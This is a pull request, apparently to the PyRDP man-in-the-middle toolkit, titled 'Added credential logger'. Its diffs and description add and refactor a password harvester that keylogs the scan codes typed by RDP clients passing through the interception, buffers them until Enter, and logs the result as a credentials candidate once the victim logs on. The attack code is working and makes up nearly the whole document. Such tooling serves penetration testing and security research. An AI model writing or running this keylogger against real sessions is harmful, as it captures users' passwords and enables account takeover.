### PR TITLE
Added credential logger

### DIFF
--- a/pyrdp/logging/observers.py
+++ b/pyrdp/logging/observers.py
@@ -6,12 +6,11 @@
 
 from logging import LoggerAdapter
 
-from pyrdp.enum import DeviceRedirectionPacketID, ErrorInfo, MCSPDUType, X224PDUType
+from pyrdp.enum import ErrorInfo, MCSPDUType, X224PDUType
 from pyrdp.layer import FastPathObserver, LayerObserver, MCSObserver, SecurityObserver, SlowPathObserver, X224Observer
 from pyrdp.parser import ClientInfoParser
-from pyrdp.pdu import DeviceRedirectionPDU, FastPathPDU, FastPathScanCodeEvent, MCSAttachUserConfirmPDU, MCSChannelJoinConfirmPDU, MCSConnectResponsePDU, MCSPDU, \
+from pyrdp.pdu import FastPathPDU, MCSAttachUserConfirmPDU, MCSChannelJoinConfirmPDU, MCSConnectResponsePDU, MCSPDU, \
     SecurityExchangePDU, SlowPathPDU, X224PDU
-from pyrdp.player.keyboard import getKeyName
 
 
 class LoggingObserver:
@@ -23,10 +22,6 @@ class LoggingObserver:
         self.log = log
 
     def logPDU(self, pdu):
-        if isinstance(pdu, DeviceRedirectionPDU):
-            if pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_USER_LOGGEDON:
-                # User has logged on
-                CredentialLogger.instance.printCandidate()
         self.log.debug("Received %(pdu)s", {"pdu": pdu})
 
 
@@ -151,83 +146,3 @@ class LayerLogger(LoggingObserver, LayerObserver):
 
     def onPDUReceived(self, pdu):
         self.logPDU(pdu)
-
-# Singleton
-class CredentialLogger(LoggingObserver):
-    """
-    Logging observer for credentials going through the fast-path layers.
-    Credentials gets printed whenever RDPDR receives a "loggon" type packet
-    """
-    instance = None
-
-    class __CredentialLogger:
-        def __init__(self, log: LoggerAdapter):
-            self.active = True
-            self.log = log
-            self.shiftPressed = False
-            self.capsLockOn = False
-            self.candidate = ""
-            self.buffer = ""
-
-        def onPDUReceived(self, pdu: FastPathPDU):
-            if self.active:
-                self.logPDU(pdu)
-
-        def logPDU(self, pdu):
-            for event in pdu.events:
-                if isinstance(event, FastPathScanCodeEvent):
-                    self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & 2 != 0)
-
-        def onScanCode(self, scanCode: int, isReleased: bool, isExtended: bool):
-            """
-            Handle scan code.
-            """
-            keyName = getKeyName(scanCode, isExtended, self.shiftPressed, self.capsLockOn)
-
-            if len(keyName) == 1:
-                if not isReleased:
-                    self.buffer += keyName
-
-            # Left or right shift
-            if scanCode in [0x2A, 0x36]:
-                self.shiftPressed = not isReleased
-
-            # Caps lock
-            elif scanCode == 0x3A and not isReleased:
-                self.capsLockOn = not self.capsLockOn
-
-            # Return
-            elif scanCode == 0x1C and not isReleased:
-                self.candidate = self.buffer
-                self.buffer = ""
-
-        # Print the last entered crendential
-        def printCandidate(self):
-            # If form is submitted with a click, print the buffer instead
-            # If the RDP client sends the credentials, both will be empty
-            if self.candidate or self.buffer:
-                self.log.info("Credentials candidate: %(candidate)s", {"candidate" : (self.candidate or self.buffer) })
-
-                # Deactivate the logger for this client
-                self.active = False
-                self.shiftPressed = False
-                self.capsLockOn = False
-                self.candidate = ""
-                self.buffer = ""
-
-    def __new__(self, log: LoggerAdapter):
-        if not CredentialLogger.instance:
-            CredentialLogger.instance = CredentialLogger.__CredentialLogger(log)
-
-        # Reactivate the logger, triggered on a new connection
-        CredentialLogger.instance.active = True
-        return CredentialLogger.instance
-
-    def __init__(self, log: LoggerAdapter):
-        super().__init__(log)
-
-    # Forward getters/setters to the instance
-    def __getattr__(self, name):
-        return getattr(self.instance, name)
-    def __setattr__(self, name):
-        return setattr(self.instance, name)

--- a/pyrdp/mitm/BasePathMITM.py
+++ b/pyrdp/mitm/BasePathMITM.py
@@ -1,0 +1,64 @@
+#
+# This file is part of the PyRDP project.
+# Copyright (C) 2019 GoSecure Inc.
+# Licensed under the GPLv3 or later.
+#
+
+from pyrdp.mitm.state import RDPMITMState
+from pyrdp.player import keyboard
+from pyrdp.enum import ScanCode
+from pyrdp.pdu.pdu import PDU
+from pyrdp.layer.layer import Layer
+
+
+class BasePathMITM:
+    """
+    Base MITM component for the fast-path and slow-path layers.
+    """
+
+    def __init__(self, state: RDPMITMState, client: Layer, server: Layer):
+        self.state = state
+        self.client = client
+        self.server = server
+
+    def onClientPDUReceived(self, pdu: PDU):
+        raise NotImplementedError("onClientPDUReceived must be overridden")
+
+
+    def onServerPDUReceived(self, pdu: PDU):
+        raise NotImplementedError("onServerPDUReceived must be overridden")
+
+
+    def onScanCode(self, scanCode: int, isReleased: bool, isExtended: bool):
+        """
+        Handle scan code.
+        """
+        keyName = keyboard.getKeyName(scanCode, isExtended, self.state.shiftPressed, self.state.capsLockOn)
+        scanCodeTuple = (scanCode, isExtended)
+
+        # Left or right shift
+        if scanCodeTuple in [ScanCode.LSHIFT, ScanCode.RSHIFT]:
+            self.state.shiftPressed = not isReleased
+        # Caps lock
+        elif scanCodeTuple == ScanCode.CAPSLOCK and not isReleased:
+            self.state.capsLockOn = not self.state.capsLockOn
+        # Control
+        elif scanCodeTuple in [ScanCode.LCONTROL, ScanCode.RCONTROL]:
+            self.state.ctrlPressed = not isReleased
+        # Backspace
+        elif scanCodeTuple == ScanCode.BACKSPACE and not isReleased:
+            self.state.inputBuffer += "<\\b>"
+        # Tab
+        elif scanCodeTuple == ScanCode.TAB and not isReleased:
+            self.state.inputBuffer += "<\\t>"
+        # CTRL + A
+        elif scanCodeTuple == ScanCode.KEY_A and self.state.ctrlPressed and not isReleased:
+            self.state.inputBuffer += "<ctrl-a>"
+        # Return
+        elif scanCodeTuple == ScanCode.RETURN and not isReleased:
+            self.state.credentialsCandidate = self.state.inputBuffer
+            self.state.inputBuffer = ""
+        # Normal input
+        elif len(keyName) == 1:
+            if not isReleased:
+                self.state.inputBuffer += keyName

--- a/pyrdp/mitm/BasePathMITM.py
+++ b/pyrdp/mitm/BasePathMITM.py
@@ -24,10 +24,8 @@ class BasePathMITM:
     def onClientPDUReceived(self, pdu: PDU):
         raise NotImplementedError("onClientPDUReceived must be overridden")
 
-
     def onServerPDUReceived(self, pdu: PDU):
         raise NotImplementedError("onServerPDUReceived must be overridden")
-
 
     def onScanCode(self, scanCode: int, isReleased: bool, isExtended: bool):
         """

--- a/pyrdp/mitm/DeviceRedirectionMITM.py
+++ b/pyrdp/mitm/DeviceRedirectionMITM.py
@@ -281,14 +281,14 @@ class DeviceRedirectionMITM(Subject):
         Handle events that should be triggered when a client logs in.
         """
 
-        if self.state.candidate or self.state.inputBuffer:
-            self.log.info("Credentials candidate: %(candidate)s", {"candidate" : (self.state.candidate or self.state.inputBuffer) })
+        if self.state.credentialsCandidate or self.state.inputBuffer:
+            self.log.info("Credentials candidate from heuristic: %(credentials_candidate)s", {"credentials_candidate" : (self.state.credentialsCandidate or self.state.inputBuffer) })
 
         # Deactivate the logger for this client
         self.state.loggedIn = True
         self.state.shiftPressed = False
         self.state.capsLockOn = False
-        self.state.candidate = ""
+        self.state.credentialsCandidate = ""
         self.state.inputBuffer = ""
 
 

--- a/pyrdp/mitm/FastPathMITM.py
+++ b/pyrdp/mitm/FastPathMITM.py
@@ -9,9 +9,9 @@ from pyrdp.mitm.state import RDPMITMState
 from pyrdp.pdu import FastPathPDU, FastPathScanCodeEvent
 from pyrdp.player import keyboard
 from pyrdp.enum import ScanCode
+from pyrdp.mitm.BasePathMITM import BasePathMITM
 
-
-class FastPathMITM:
+class FastPathMITM(BasePathMITM):
     """
     MITM component for the fast-path layer.
     """
@@ -22,10 +22,7 @@ class FastPathMITM:
         :param server: fast-path layer for the server side
         :param state: the MITM state.
         """
-
-        self.client = client
-        self.server = server
-        self.state = state
+        super().__init__(state, client, server)
 
         self.client.createObserver(
             onPDUReceived = self.onClientPDUReceived,
@@ -47,37 +44,3 @@ class FastPathMITM:
     def onServerPDUReceived(self, pdu: FastPathPDU):
         if self.state.forwardOutput:
             self.client.sendPDU(pdu)
-
-    def onScanCode(self, scanCode: int, isReleased: bool, isExtended: bool):
-        """
-        Handle scan code.
-        """
-        keyName = keyboard.getKeyName(scanCode, isExtended, self.state.shiftPressed, self.state.capsLockOn)
-        scanCodeTuple = (scanCode, isExtended)
-
-        # Left or right shift
-        if scanCodeTuple in [ScanCode.LSHIFT, ScanCode.RSHIFT]:
-            self.state.shiftPressed = not isReleased
-        # Caps lock
-        elif scanCodeTuple == ScanCode.CAPSLOCK and not isReleased:
-            self.state.capsLockOn = not self.state.capsLockOn
-        # Control
-        elif scanCodeTuple in [ScanCode.LCONTROL, ScanCode.RCONTROL]:
-            self.state.ctrlPressed = not isReleased
-        # Backspace
-        elif scanCodeTuple == ScanCode.BACKSPACE and not isReleased:
-            self.state.inputBuffer += "<\\b>"
-        # Tab
-        elif scanCodeTuple == ScanCode.TAB and not isReleased:
-            self.state.inputBuffer += "<\\t>"
-        # CTRL + A
-        elif scanCodeTuple == ScanCode.KEY_A and self.state.ctrlPressed and not isReleased:
-            self.state.inputBuffer += "<ctrl-a>"
-        # Return
-        elif scanCodeTuple == ScanCode.RETURN and not isReleased:
-            self.state.credentialsCandidate = self.state.inputBuffer
-            self.state.inputBuffer = ""
-        # Normal input
-        elif len(keyName) == 1:
-            if not isReleased:
-                self.state.inputBuffer += keyName

--- a/pyrdp/mitm/FastPathMITM.py
+++ b/pyrdp/mitm/FastPathMITM.py
@@ -7,7 +7,7 @@
 from pyrdp.layer import FastPathLayer
 from pyrdp.mitm.state import RDPMITMState
 from pyrdp.pdu import FastPathPDU, FastPathScanCodeEvent
-from pyrdp.player.keyboard import getKeyName
+from pyrdp.player import keyboard
 from pyrdp.enum import ScanCode
 
 
@@ -42,7 +42,7 @@ class FastPathMITM:
         if not self.state.loggedIn:
             for event in pdu.events:
                 if isinstance(event, FastPathScanCodeEvent):
-                    self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & 2 != 0)
+                    self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & keyboard.KBDFLAGS_EXTENDED != 0)
 
     def onServerPDUReceived(self, pdu: FastPathPDU):
         if self.state.forwardOutput:
@@ -52,7 +52,7 @@ class FastPathMITM:
         """
         Handle scan code.
         """
-        keyName = getKeyName(scanCode, isExtended, self.state.shiftPressed, self.state.capsLockOn)
+        keyName = keyboard.getKeyName(scanCode, isExtended, self.state.shiftPressed, self.state.capsLockOn)
         scanCodeTuple = (scanCode, isExtended)
 
         # Left or right shift

--- a/pyrdp/mitm/FastPathMITM.py
+++ b/pyrdp/mitm/FastPathMITM.py
@@ -6,8 +6,8 @@
 
 from pyrdp.layer import FastPathLayer
 from pyrdp.mitm.state import RDPMITMState
-from pyrdp.pdu import FastPathPDU
-
+from pyrdp.pdu import FastPathPDU, FastPathScanCodeEvent
+from pyrdp.player.keyboard import getKeyName
 
 class FastPathMITM:
     """
@@ -37,6 +37,34 @@ class FastPathMITM:
         if self.state.forwardInput:
             self.server.sendPDU(pdu)
 
+        if not self.state.loggedIn:
+            for event in pdu.events:
+                if isinstance(event, FastPathScanCodeEvent):
+                    self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & 2 != 0)
+
     def onServerPDUReceived(self, pdu: FastPathPDU):
         if self.state.forwardOutput:
             self.client.sendPDU(pdu)
+
+    def onScanCode(self, scanCode: int, isReleased: bool, isExtended: bool):
+        """
+        Handle scan code.
+        """
+        keyName = getKeyName(scanCode, isExtended, self.state.shiftPressed, self.state.capsLockOn)
+
+        if len(keyName) == 1:
+            if not isReleased:
+                self.state.inputBuffer += keyName
+
+        # Left or right shift
+        if scanCode in [0x2A, 0x36]:
+            self.state.shiftPressed = not isReleased
+
+        # Caps lock
+        elif scanCode == 0x3A and not isReleased:
+            self.state.capsLockOn = not self.state.capsLockOn
+
+        # Return
+        elif scanCode == 0x1C and not isReleased:
+            self.state.candidate = self.state.inputBuffer
+            self.state.inputBuffer = ""

--- a/pyrdp/mitm/mitm.py
+++ b/pyrdp/mitm/mitm.py
@@ -16,7 +16,7 @@ from pyrdp.enum import MCSChannelName, ParserMode, PlayerPDUType, ScanCode, Segm
 from pyrdp.layer import ClipboardLayer, DeviceRedirectionLayer, LayerChainItem, RawLayer, VirtualChannelLayer
 from pyrdp.logging import RC4LoggingObserver
 from pyrdp.logging.adapters import SessionLogger
-from pyrdp.logging.observers import FastPathLogger, LayerLogger, MCSLogger, SecurityLogger, SlowPathLogger, X224Logger
+from pyrdp.logging.observers import CredentialLogger, FastPathLogger, LayerLogger, MCSLogger, SecurityLogger, SlowPathLogger, X224Logger
 from pyrdp.mcs import MCSClientChannel, MCSServerChannel
 from pyrdp.mitm.AttackerMITM import AttackerMITM
 from pyrdp.mitm.ClipboardMITM import ActiveClipboardStealer
@@ -227,6 +227,7 @@ class RDPMITM:
 
         self.client.security.addObserver(SecurityLogger(self.getClientLog("security")))
         self.client.fastPath.addObserver(FastPathLogger(self.getClientLog("fastpath")))
+        self.client.fastPath.addObserver(CredentialLogger(self.getClientLog("credential")))
         self.client.fastPath.addObserver(RecordingFastPathObserver(self.recorder, PlayerPDUType.FAST_PATH_INPUT))
 
         self.server.security.addObserver(SecurityLogger(self.getServerLog("security")))

--- a/pyrdp/mitm/mitm.py
+++ b/pyrdp/mitm/mitm.py
@@ -16,7 +16,7 @@ from pyrdp.enum import MCSChannelName, ParserMode, PlayerPDUType, ScanCode, Segm
 from pyrdp.layer import ClipboardLayer, DeviceRedirectionLayer, LayerChainItem, RawLayer, VirtualChannelLayer
 from pyrdp.logging import RC4LoggingObserver
 from pyrdp.logging.adapters import SessionLogger
-from pyrdp.logging.observers import CredentialLogger, FastPathLogger, LayerLogger, MCSLogger, SecurityLogger, SlowPathLogger, X224Logger
+from pyrdp.logging.observers import FastPathLogger, LayerLogger, MCSLogger, SecurityLogger, SlowPathLogger, X224Logger
 from pyrdp.mcs import MCSClientChannel, MCSServerChannel
 from pyrdp.mitm.AttackerMITM import AttackerMITM
 from pyrdp.mitm.ClipboardMITM import ActiveClipboardStealer
@@ -227,7 +227,6 @@ class RDPMITM:
 
         self.client.security.addObserver(SecurityLogger(self.getClientLog("security")))
         self.client.fastPath.addObserver(FastPathLogger(self.getClientLog("fastpath")))
-        self.client.fastPath.addObserver(CredentialLogger(self.getClientLog("credential")))
         self.client.fastPath.addObserver(RecordingFastPathObserver(self.recorder, PlayerPDUType.FAST_PATH_INPUT))
 
         self.server.security.addObserver(SecurityLogger(self.getServerLog("security")))
@@ -298,7 +297,7 @@ class RDPMITM:
         LayerChainItem.chain(client, clientSecurity, clientVirtualChannel, clientLayer)
         LayerChainItem.chain(server, serverSecurity, serverVirtualChannel, serverLayer)
 
-        deviceRedirection = DeviceRedirectionMITM(clientLayer, serverLayer, self.getLog(MCSChannelName.DEVICE_REDIRECTION), self.config)
+        deviceRedirection = DeviceRedirectionMITM(clientLayer, serverLayer, self.getLog(MCSChannelName.DEVICE_REDIRECTION), self.config, self.state)
         self.channelMITMs[client.channelID] = deviceRedirection
 
         if self.attacker:

--- a/pyrdp/mitm/state.py
+++ b/pyrdp/mitm/state.py
@@ -57,7 +57,7 @@ class RDPMITMState:
         self.inputBuffer = ""
         """Used to store what the client types"""
 
-        self.candidate = ""
+        self.credentialsCandidate = ""
         """The potential client password"""
 
         self.shiftPressed = False
@@ -65,6 +65,9 @@ class RDPMITMState:
 
         self.capsLockOn = False
         """The current keyboard capsLock state"""
+
+        self.ctrlPressed = False
+        """The current keybaord ctrl state"""
 
         self.securitySettings.addObserver(self.crypters[ParserMode.CLIENT])
         self.securitySettings.addObserver(self.crypters[ParserMode.SERVER])

--- a/pyrdp/mitm/state.py
+++ b/pyrdp/mitm/state.py
@@ -51,6 +51,21 @@ class RDPMITMState:
         self.forwardOutput = True
         """Whether output from the server should be forwarded to the client"""
 
+        self.loggedIn = False
+        """Keep tracks of the client login status"""
+
+        self.inputBuffer = ""
+        """Used to store what the client types"""
+
+        self.candidate = ""
+        """The potential client password"""
+
+        self.shiftPressed = False
+        """The current keyboard shift state"""
+
+        self.capsLockOn = False
+        """The current keyboard capsLock state"""
+
         self.securitySettings.addObserver(self.crypters[ParserMode.CLIENT])
         self.securitySettings.addObserver(self.crypters[ParserMode.SERVER])
 

--- a/pyrdp/player/PlayerEventHandler.py
+++ b/pyrdp/player/PlayerEventHandler.py
@@ -185,7 +185,7 @@ class PlayerEventHandler(Observer):
             elif isinstance(event, FastPathMouseEvent):
                 self.onMouse(event)
             elif isinstance(event, FastPathScanCodeEvent):
-                self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & 2 != 0)
+                self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & keyboard.KBDFLAGS_EXTENDED != 0)
 
 
     def onUnicode(self, event: FastPathUnicodeEvent):

--- a/pyrdp/player/keyboard.py
+++ b/pyrdp/player/keyboard.py
@@ -9,6 +9,9 @@ from typing import Optional
 from PySide2.QtCore import Qt
 from PySide2.QtGui import QKeyEvent
 
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/089d362b-31eb-4a1a-b6fa-92fe61bb5dbf
+KBDFLAGS_EXTENDED = 2
+
 SCANCODE_MAPPING = {
     Qt.Key.Key_Escape: 0x01,
     Qt.Key.Key_1: 0x02,


### PR DESCRIPTION
Here is the password harvester showcased in this issue #103.

I implemented a new logger based on the FastPathLogger. The new CredentialLogger is a singleton, since it needs to be referenced from somewhere it won't be defined in order to print credentials. I tried an implementation with a static method and a few static variable at first, but this once made more sense since there will never be two instances of a logger.

We keylog everything the users sends, and we save them as a candidate whenever the user presses the "ENTER" key. When we receive a confirmation that the user logged in, we print the candidate (or the buffer if the user submitted the form with a click)

When the user logs in, the logger deactivate itself. Whenever a new client connects, it gets reactivated.

This should give us good credentials most of the time, but It may give false-positives if the user press keys while not in an input field, or if he spams his keyboard right after being logged in but before receiving the "RDPDR" signal.